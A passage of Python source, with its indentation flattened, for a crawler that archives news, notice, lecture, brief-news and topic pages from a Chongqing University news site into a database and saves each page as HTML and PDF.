cur.execute("SELECT name from t_spider_config_xpath where name like %s", news_heading + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
# [4:-5] strips the four leading characters '媒体重大' and the trailing five characters 'xpath'
if each[0][4:-5] == '具体新闻内容':
resource = get_xpath_content(html, each[0])[-1]
if each[0][4:-5] == '作者所属单位':
department = get_xpath_content(html, each[0])[:-4]
dict_media[each[0][4:-5]] = department
else:
dict_media[each[0][4:-5]] = get_xpath_content(html, each[0])
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
dict_media['标题'] = title
dict_media['发布时间'] = release_time
dict_media['来源(转载来源)'] = resource
dict_media['网址'] = each_url
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_media['采集时间'] = time_now
dict_media['采集人'] = '档案馆'
json_dict = json.dumps(dict_media, ensure_ascii=False, indent=4)
print(json_dict)
judge_identifier = not_found_judge(raw_html, r)
# Check whether the page is a 404 not found
if judge_identifier:
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, html_file, pdf_file,
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# Convert the HTML page to PDF
pdfkit.from_url(each_url, pdf_file, configuration=confg, options=options)
print('该新闻《{}》pdf格式已转换成功。'.format(title))
time.sleep(sleep_time)
else:
# Record the 404 page in the database
html_filter = '404 not found'
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, '', '',
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该新闻《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(title))
sum_i += 1
else:
sum_i += 1
print('{} 栏目 的 第 {} 条新闻 已爬取过且保存在数据库中!'.format(news_heading, sum_i))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的媒体新闻已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条媒体新闻'.format(news_heading, page - 1, sum_i))
# Read the URL of every 通知公告简报 page, collect each item's archival metadata, and save each page as PDF
def get_notice_info(url_list, f_data):
global dict_data
# Load previously crawled records from the dict file
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# Running count of notices
sum_i = 0
# Page counter for 通知公告简报
page = 1
news_heading = '通知公告简报'
# Fetch the config-table id to store with each result row
conf_id = get_conf_id(news_heading)
# Metadata dict for the 通知公告简报 column
dict_notice = dict()
dict_notice = {'网站名称': spider_name, '网站域名': spider_url}
# Create the output folder if it does not exist yet
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# Iterate over each listing-page URL
for url in url_list:
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
links_list = get_xpath_content(html, '通知公告简报网址xpath')
title_list = get_xpath_content(html, '通知公告简报标题xpath')
# Pair each notice URL with its title
for each_url, title in zip(links_list, title_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条通知公告。'.format(news_heading, page, sum_i + 1))
# Record this notice URL in the dict and the database; skip it if already recorded
judge = each_url in dict_data.keys()
try:
if not judge:
dict_data[each_url] = title
r = requests.get(each_url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
# Special-case links that redirect to WeChat official-account articles
if 'weixin' in each_url:
title = html.xpath('//h2[@class="rich_media_title"]/text()')
title = ''.join(title)
title = title.strip()
dict_notice['所属栏目'] = news_heading
# Fetch the xpaths from the database and extract content with them
try:
cur.execute("SELECT name from t_spider_config_xpath where name like %s",
news_heading + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
# [6:-5] strips the six leading characters '通知公告简报' and the trailing five characters 'xpath'
dict_notice[each[0][6:-5]] = get_xpath_content(html, each[0])
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
dict_notice['标题'] = title
dict_notice['网址'] = each_url
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_notice['采集时间'] = time_now
dict_notice['采集人'] = '档案馆'
if dict_notice['发布时间']:
release_time = dict_notice['发布时间']
else:
release_time = None
json_dict = json.dumps(dict_notice, ensure_ascii=False, indent=4)
print(json_dict)
judge_identifier = not_found_judge(raw_html, r)
# Check whether the page is a 404 not found
if judge_identifier:
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, html_file, pdf_file,
time_now, news_heading, release_time, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# Convert the HTML page to PDF
pdfkit.from_url(each_url, pdf_file, configuration=confg, options=options)
print('该通知《{}》pdf格式已转换成功。'.format(title))
time.sleep(sleep_time)
else:
# Record the 404 page in the database
html_filter = '404 not found'
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, '', '',
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该通知《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(title))
sum_i += 1
else:
sum_i += 1
print('{} 栏目 的 第 {} 条通知 已爬取过且保存在数据库中!'.format(news_heading, sum_i))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的通知公告简报已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条通知公告简报'.format(news_heading, page - 1, sum_i))
# Read the URL of every 学术预告 page, collect each item's archival metadata, and save each page as PDF
def get_academic_info(url_list, f_data):
global dict_data
# Load previously crawled records from the dict file
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# Running count of lectures
sum_i = 0
# Page counter for 学术预告
page = 1
news_heading = '学术预告'
# Fetch the config-table id to store with each result row
conf_id = get_conf_id(news_heading)
dict_academic = dict()
dict_academic = {'网站名称': spider_name, '网站域名': spider_url}
# Create the output folder if it does not exist yet
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# Iterate over each listing-page URL
for url in url_list:
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
# Filter the lecture links, keeping only absolute URLs
links_list = get_xpath_content(html, '学术预告网址xpath')
temp = []
for each in links_list:
if 'http' in each:
temp.append(each)
links_list = temp
title_list = get_xpath_content(html, '学术预告标题xpath')
# Pair each lecture URL with its title
for each_url, title in zip(links_list, title_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条讲座。'.format(news_heading, page, sum_i + 1))
# Record this lecture URL in the dict and the database; skip it if already recorded
judge = each_url in dict_data.keys()
try:
if not judge:
dict_data[each_url] = title
r = requests.get(each_url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
dict_academic['所属栏目'] = news_heading
# Fetch the xpaths from the database and extract content with them
try:
cur.execute("SELECT name from t_spider_config_xpath where name like %s", news_heading + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
# [4:-5] strips the four leading characters '学术预告' and the trailing five characters 'xpath'
dict_academic[each[0][4:-5]] = get_xpath_content(html, each[0])
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
dict_academic['标题'] = title
dict_academic['网址'] = each_url
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_academic['采集时间'] = time_now
dict_academic['采集人'] = '档案馆'
json_dict = json.dumps(dict_academic, ensure_ascii=False, indent=4)
print(json_dict)
judge_identifier = not_found_judge(raw_html, r)  # pass r so gb2312 pages are re-decoded, as at the other call sites
# Check whether the page is a 404 not found
if judge_identifier:
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, html_file, pdf_file,
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# Convert the HTML page to PDF
pdfkit.from_url(each_url, pdf_file, configuration=confg, options=options)
print('该讲座预告《{}》pdf格式已转换成功。'.format(title))
time.sleep(sleep_time)
else:
# Record the 404 page in the database
html_filter = '404 not found'
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, '', '',
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该讲座预告《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(title))
sum_i += 1
else:
sum_i += 1
print('{} 栏目 的 第 {} 条讲座预告 已爬取过且保存在数据库中!'.format(news_heading, sum_i))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的讲座预告已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条讲座预告'.format(news_heading, page - 1, sum_i))
# Read the URL of every 快讯 page, collect each item's archival metadata, and save each page as PDF
def get_express_info(url_list, f_data):
global dict_data
# Load previously crawled records from the dict file
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# Running count of express-news items
sum_i = 0
# Page counter for 快讯
page = 1
# Counter used when pairing month/day fragments of the publish time
i = 0
news_heading = '快讯'
# Fetch the config-table id to store with each result row
conf_id = get_conf_id(news_heading)
dict_express = dict()
dict_express = {'网站名称': spider_name, '网站域名': spider_url}
# Create the output folder if it does not exist yet
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
for url in url_list:
# Record each express-news page URL in the database; skip it if already recorded
judge = url in dict_data.keys()
try:
if not judge:
# Store the express page link together with its page label
express_title = '快讯第' + str(page) + '页'
dict_data[url] = express_title
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
# Parse the publish time, title and body of each express item
release_time_list, title_list, content_list = [], [], []
try:
cur.execute("SELECT name from t_spider_config_xpath where name like %s", '快讯' + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
# [2:-5] strips the two leading characters '快讯' and the trailing five characters 'xpath'
dict_key = each[0][2:-5]
if dict_key == '标题':
title_list = get_xpath_content(html, each[0])
if dict_key == '发布时间':
release_time_list = get_xpath_content(html, each[0])
if dict_key == '具体内容':
content_list = get_xpath_content(html, each[0])
if dict_key != '类栏目标题':
dict_express[dict_key] = ''
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
# Normalise the publish-time fragments
temp_list = []
for each in release_time_list:
each = each.strip()
# print(each)
temp_list.append(each)
release_time_list = []
while i < len(temp_list)-1:
release_time = temp_list[i] + '月' + temp_list[i+1] + '日'
release_time_list.append(release_time)
i += 2
# Reset the pairing counter
i = 0
# Normalise the express-news body text
temp_list = []
for each in content_list:
each = each.strip()
temp_list.append(each)
content_list = temp_list
for release_time, title, content in zip(release_time_list, title_list, content_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条快讯。'.format(news_heading, page, sum_i + 1))
print('发布时间:{}, 快讯标题:{}, 快讯内容:{}'.format(release_time, title, content))
# Update the dict and serialise it as JSON
dict_express['所属栏目'] = news_heading
dict_express['标题'] = title
dict_express['发布时间'] = release_time
dict_express['具体内容'] = content
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_express['采集时间'] = time_now
dict_express['采集人'] = '档案馆'
json_dict = json.dumps(dict_express, ensure_ascii=False, indent=4)
print(json_dict)
cur.execute(insert_result, (conf_id, 'detail', url, html_filter, html_file, pdf_file,
time_now, news_heading, None, json_dict))
conn.commit()
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# Convert the HTML page to PDF
pdfkit.from_string(html_filter, pdf_file, configuration=confg, options=options)
print('快讯第 {} 页pdf格式已转换成功。'.format(page))
time.sleep(sleep_time)
else:
print('{} 栏目 第{}页快讯 已爬取过且保存在数据库中!'.format(news_heading, page))
sum_i += 20  # an already-crawled listing page is counted as 20 items
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的新闻已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条快讯'.format(news_heading, page - 1, sum_i))
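The month/day pairing loop used in get_media_info and get_express_info can be isolated as a small helper; the input fragments below are hypothetical:

```python
def pair_dates(fragments):
    # Pair alternating month/day fragments into 'M月D日' strings,
    # mirroring the two-at-a-time index loop above.
    fragments = [f.strip() for f in fragments]
    return [fragments[i] + '月' + fragments[i + 1] + '日'
            for i in range(0, len(fragments) - 1, 2)]

print(pair_dates([' 06 ', '12', '06', '13']))  # → ['06月12日', '06月13日']
```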
# Fetch each special topic's detail page and save it as HTML and PDF
def get_topic_info(url_dict, f_data):
global dict_data
# Load previously crawled records from the dict file
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# Running count of special topics
sum_i = 0
news_heading = '专题'
# Fetch the config-table id to store with each result row
conf_id = get_conf_id(news_heading)
dict_topic = dict()
dict_topic = {'网站名称': spider_name, '网站域名': spider_url}
# Create the output folder if it does not exist yet
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# key: topic title, value: topic URL
for key, value in url_dict.items():
print('正在爬取 {} 栏目下,第 {} 个专题。'.format(news_heading, sum_i + 1))
# Record this topic URL in the dict and the database; skip it if already recorded
judge = value in dict_data.keys()
try:
if not judge:
dict_data[value] = key
res = requests.get(value, headers=headers)
res.encoding = 'UTF-8'
raw_html = res.text
# Check whether the page is a 404 not found
judge_identifier = not_found_judge(raw_html, res)
if judge_identifier:
html_filter = sensitive_word_filter(raw_html)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
# Update the dict and serialise it as JSON
dict_topic['所属栏目'] = news_heading
dict_topic['标题'] = key
dict_topic['网址'] = value
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_topic['采集时间'] = time_now
json_dict = json.dumps(dict_topic, ensure_ascii=False, indent=4)
print(json_dict)
cur.execute(insert_result, (conf_id, 'detail', value, html_filter, html_file, pdf_file,
time_now, news_heading, None, json_dict))
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
conn.commit()
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# Convert the HTML page to PDF
pdfkit.from_url(value, pdf_file, configuration=confg, options=options)
print('该专题《{}》pdf格式已转换成功。'.format(key))
time.sleep(sleep_time)
else:
# Record the 404 page in the database
html_filter = '404 not found'
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
cur.execute(insert_result,
(conf_id, 'detail', value, html_filter, '', '', time_now, news_heading, None, ''))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该专题《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(key))
else:
print('{} 栏目 {} 专题已爬取过且保存在数据库中!'.format(news_heading, key))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的新闻已全部爬取完!".format(news_heading))
break
sum_i += 1
print('{} 栏目下 共有{}条专题'.format(news_heading, sum_i))
# Check whether a page is a 404 not found; returns 0 for a missing page, 1 for a normal page
def not_found_judge(html, r=None):
judge_identifier = 1
# temp/temp_2..5 hold str.find results: the marker's index, or -1 when absent
# If the page declares gb2312 encoding, re-decode it before searching
if r:
encode_judge = html.find('gb2312')
if encode_judge != -1:
r.encoding = 'gb2312'
html = r.text
temp = html.find('404 Not Found')
temp_2 = html.find('页面不存在')
temp_3 = html.find('页面未找到')
temp_4 = html.find('Page Not Found')
temp_5 = html.find('<div class="content guery" style="display:inline-block;display:-moz-inline-stack;zoom:1;*display:inline; max-width:280px">')
if temp != -1 or temp_2 != -1 or temp_3 != -1 or temp_4 != -1 or temp_5 != -1:
judge_identifier = 0
print('该网页目前无法访问!')
return judge_identifier
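The marker search above reduces to a membership test; a minimal standalone sketch (marker list abridged, without the gb2312 re-decode step):

```python
def looks_like_404(html):
    # A page is treated as missing when any known 404 marker appears in it
    markers = ('404 Not Found', 'Page Not Found', '页面不存在', '页面未找到')
    return any(marker in html for marker in markers)

print(looks_like_404('<h1>404 Not Found</h1>'))  # → True
print(looks_like_404('<h1>新闻正文</h1>'))  # → False
```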
# Sensitive-word filtering (AC automaton)
def sensitive_word_filter(content):
ah = Ac_auto.ac_automation()
path = 'sensitive_words.txt'
ah.parse(path)
content = ah.words_replace(content)
# text1 = "新疆骚乱苹果新品发布会"
# text2 = ah.words_replace(text1)
# print(text1)
# print(text2)
return content
# Rewrite relative image paths in a page to absolute URLs
# Takes raw html source, fixes the image paths and returns the new html
def path_rewrite(html):
new_html = re.sub('="/uploadfile/', '="http://news.cqu.edu.cn/uploadfile/', html)
return new_html
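A quick standalone check of the rewrite; the sample tag is hypothetical:

```python
import re

def path_rewrite(html):
    # Root-relative upload paths become absolute URLs on the news site
    return re.sub('="/uploadfile/', '="http://news.cqu.edu.cn/uploadfile/', html)

sample = '<img src="/uploadfile/2019/photo.jpg">'
print(path_rewrite(sample))
# → <img src="http://news.cqu.edu.cn/uploadfile/2019/photo.jpg">
```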
def main():
"""
Collect all column links.
all_news_urls[0-4]: category 1, the news module (综合新闻, 教学科研, 招生就业, 交流合作, 校园生活 columns)
all_news_urls[5]: category 2, 媒体重大
all_news_urls[6]: category 3, 通知公告简报
all_news_urls[7]: category 4, 学术预告
all_news_urls[8]: category 5, 快讯
all_news_urls[9]: category 6, 专题
"""
with open('dict_data.txt', 'r+') as f_data:
all_news_urls = all_urls_list(f_data)
# Collect the per-page links under each column
# Category 1: the news module (综合新闻, 教学科研, 招生就业, 交流合作, 校园生活 columns)
for url in all_news_urls[:5]:
url_list = get_url_list(url, all_news_urls, f_data)
get_news_info(url_list, url, all_news_urls, f_data)
time.sleep(sleep_time)
# Category 2: 媒体重大
url = all_news_urls[5]
url_list = get_url_list(url, all_news_urls, f_data)
get_media_info(url_list, f_data)
time.sleep(sleep_time)
# Category 3: 通知公告简报
url = all_news_urls[6]
url_list = get_url_list(url, all_news_urls, f_data)
get_notice_info(url_list, f_data)
time.sleep(sleep_time)
# Category 4: 学术预告
url = all_news_urls[7]
url_list = get_url_list(url, all_news_urls, f_data)
get_academic_info(url_list, f_data)
time.sleep(sleep_time)
# Category 5: 快讯
url = all_news_urls[8]
url_list = get_url_list(url, all_news_urls, f_data)
get_express_info(url_list, f_data)
time.sleep(sleep_time)
# Category 6: 专题
url = all_news_urls[9]
url_dict = get_topic_url_list(url, f_data)
get_topic_info(url_dict, f_data)
time.sleep(sleep_time)
print('{} {} 的爬虫任务已完成!'.format(spider_name, spider_url))
cur = conn.cursor()
if __name__ == '__main__':
main()
# Crawl finished: set the spider task status to -1 (stopped)
cur.execute("UPDATE t_spider_task SET status = -1 WHERE id = %s", task_id)
cur.close()
conn.commit()
conn.close()